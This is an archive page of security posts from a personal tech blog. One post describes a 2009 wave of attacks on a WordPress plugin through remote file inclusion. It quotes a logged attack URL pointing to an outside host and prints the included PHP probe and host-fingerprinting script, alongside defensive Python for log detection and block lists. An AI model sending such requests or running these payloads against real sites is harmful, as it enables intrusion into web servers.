Archive

Posts Tagged ‘security’

Firestats WordPress Exploit

June 13th, 2009 4 comments

The vulnerability described below has been resolved in Firestats 1.6.2, which you can download from http://firestats.cc/wiki/Download

Disclaimer: I have nothing at all to do with the development of Firestats. I am merely an end user.

Over the last few hours I have been watching a major attempt at cracking both of my WordPress installations. A quick investigation tells me that the cracking attempts are looking for this vulnerability in Firestats.

At present there have been over 600 attempts from servers all over the globe, each of which requests the path to firestats-wordpress.php and tries to exploit it using a script hosted elsewhere.

A sample from my logs looks like this:

http://tech.sweetnam.eu/tag/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=http://www.x-pronet.com/board/forum/fx29id.txt??

The request passes a URL in the fs_javascript parameter, so the vulnerable code fetches and executes a script hosted on another server (a remote file inclusion). The trailing ?? is the usual trick for turning anything the vulnerable code appends to the parameter into a harmless query string on the fetched URL. The included script comes in two versions. The most common one, as in the request above, has the following contents and is just a probe: if FeeLCoMz shows up in the response, the scanner knows the inclusion worked.

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

The other one fingerprints the host, reporting the kernel, OS, the user the web server runs as, and disk usage:

<?php
// Picks a unit from the number of digits in the byte count.
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }

// Fingerprint the host: kernel string, OS, the web server's uid and disk usage.
echo "Osirys<br>";
$un = @php_uname();
$id1 = system('id'); // the original used the bare word id; quoted so it runs on current PHP
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "0sirys was here and also is a fucking gay..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

All I can recommend at the moment is removing firestats from your WordPress installation. It seems to be the only way to be sure for the moment.
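To spot this kind of probe in your own logs, here is an added example (my code, not the post's and not part of Firestats) that parses combined-format access log lines and flags any query parameter whose value is an absolute URL to another host, the signature of a remote file inclusion attempt. The log lines are constructed for the example; the source addresses are documentation ranges, and only the x-pronet.com URL is copied from the sample request in the post.

```python
"""Flag remote-file-inclusion probes in a combined-format access log.

Added example, not code from the original post. SAMPLE_LOG is constructed:
the source IPs are documentation addresses, and only the x-pronet.com URL is
taken from the request quoted in the post.
"""
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed sample: two probes, one legitimate fs_javascript request, one
# plain scan for xmlrpc.php (no RFI payload, so it must not be flagged here).
SAMPLE_LOG = """\
203.0.113.7 - - [13/Jun/2009:10:02:11 +0000] "GET /tag/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 200 19 "-" "libwww-perl/5.803"
198.51.100.23 - - [13/Jun/2009:10:02:40 +0000] "GET /wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=/wp-content/plugins/firestats/js/firestats.js HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.9 - - [13/Jun/2009:10:03:05 +0000] "GET /index.php?page=http://203.0.113.50/shell.txt? HTTP/1.1" 404 210 "-" "Mozilla/4.0"
203.0.113.7 - - [13/Jun/2009:10:03:30 +0000] "GET http://blog.example:80//blogtest/xmlsrv/xmlrpc.php HTTP/1.1" 403 2371 "-" "libwww-perl/5.803" TCP_DENIED:NONE
"""

# Combined log format: ip ident user [time] "METHOD target PROTO" status bytes "referer" "ua"
# match() rather than fullmatch(), so proxy logs with extra trailing fields still parse.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# A parameter value that is itself an absolute URL is what include() would
# fetch from a remote host if the script passes it through unchecked.
ABSOLUTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def rfi_indicators(target):
    """Return (param, remote_host, truncated) for each query parameter whose
    value is an absolute URL. truncated is True when the value ends in '?',
    the trick that pushes whatever the vulnerable script appends into the
    query string of the fetched URL instead of its path."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if ABSOLUTE_URL.match(value):
            hits.append((name, urlsplit(value).hostname, value.endswith('?')))
    return hits


def scan(log_text):
    """Return (source_ip, script, param, remote_host) for every RFI probe."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        script = urlsplit(rec['target']).path.rsplit('/', 1)[-1]
        for param, host, _truncated in rfi_indicators(rec['target']):
            findings.append((rec['ip'], script, param, host))
    return findings


def probes_per_ip(findings):
    """Tally probes by source address, the input a block list is built from."""
    return Counter(ip for ip, *_ in findings)


if __name__ == "__main__":
    for ip, script, param, host in scan(SAMPLE_LOG):
        print(f"{ip} probed {script} via {param}= pointing at {host}")
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents. Note that the second sample line, where fs_javascript carries a local path, is not flagged: the check is on the parameter value being a URL to another host, not on the parameter name, so the same function catches the index.php?page= probe as well.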

Updated Blacklists

January 28th, 2009 2 comments

I’m pretty attentive when it comes to securing my server and I can be exceptionally pedantic when deciding what constitutes bad behaviour or misuse of my webserver. Typically this would include crawlers that ignore robots.txt and script kiddies looking for certain versions of software etc.

To that end I use a combination of network blacklists, enforced on the webserver with shorewall, and user-agent matching, performed on my reverse proxy.

For the past two days I have had repeated attempted crawls from Chinese netspace, all looking for the same vulnerabilities and almost all using libwww-perl as their user agent. An example is below:

61.151.239.75 - - [28/Jan/2009:18:08:38 +0000] "GET http://blog.sweetnam.eu:80//blogtest/xmlsrv/xmlrpc.php HTTP/1.1" 403 2371 "-" "libwww-perl/5.803" TCP_DENIED:NONE

The crawler above appears to be from the CHINANET Shanghai province network, but I have had literally thousands of scan attempts from many different Chinese addresses. So once more I have decided to block all of China from accessing my webserver, in addition to the other hosts that I already block.

The link below contains a list of IP addresses that my firewall rejects requests from. The first 763 lines are from China alone.

http://tech.sweetnam.eu/blacklists/blacklist.txt
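A list like the one linked above grows by hundreds of single addresses, so it pays to aggregate it. The following is an added example (my code, not the post's blacklist and not its shorewall configuration) that turns a set of offending source addresses into a compact list of networks to reject. The addresses are constructed documentation ranges; the rule that a /24 with three or more distinct scanning hosts is blocked whole, and the one-address-or-CIDR-per-line output, are assumptions for illustration rather than anything the post states.

```python
"""Aggregate scanning source addresses into a compact block list.

Added example, not the post's own blacklist or firewall configuration. The
offenders are constructed documentation addresses; the /24 escalation rule
and the one-entry-per-line output format are assumptions for illustration.
"""
import ipaddress
from collections import defaultdict

# Constructed: source addresses seen scanning, e.g. from an access-log tally.
OFFENDERS = [
    "203.0.113.7", "203.0.113.19", "203.0.113.200",   # three hosts in one /24
    "198.51.100.24", "198.51.100.25",                 # two adjacent hosts
    "192.0.2.9",                                      # a lone host
]
HOSTS_PER_NET_THRESHOLD = 3  # assumption: this many hosts in a /24 blocks the /24


def build_blocklist(addresses, threshold=HOSTS_PER_NET_THRESHOLD):
    """Return a sorted list of IPv4 networks to reject.

    A /24 containing at least `threshold` distinct offending hosts is blocked
    whole; other hosts are kept as /32s, and collapse_addresses() merges any
    that happen to be adjacent into a single prefix."""
    hosts_by_net = defaultdict(set)
    for addr in addresses:
        ip = ipaddress.ip_address(addr)
        hosts_by_net[ipaddress.ip_network(f"{ip}/24", strict=False)].add(ip)

    nets = []
    for net, hosts in hosts_by_net.items():
        if len(hosts) >= threshold:
            nets.append(net)
        else:
            nets.extend(ipaddress.ip_network(str(h)) for h in hosts)
    return sorted(ipaddress.collapse_addresses(nets))


def is_blocked(addr, blocklist):
    """True if addr falls inside any network on the list."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in blocklist)


def blacklist_lines(blocklist):
    """Render one address or CIDR per line (assumed file format)."""
    return [str(net) for net in blocklist]


if __name__ == "__main__":
    for line in blacklist_lines(build_blocklist(OFFENDERS)):
        print(line)
```

With the constructed input this yields three entries instead of six: the /24 that three hosts came from, one /31 for the adjacent pair, and one /32. Escalating to a whole /24 on a small number of hosts is a policy choice; a lower threshold blocks more collateral addresses, which is the same trade-off the post makes in blocking a whole country.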
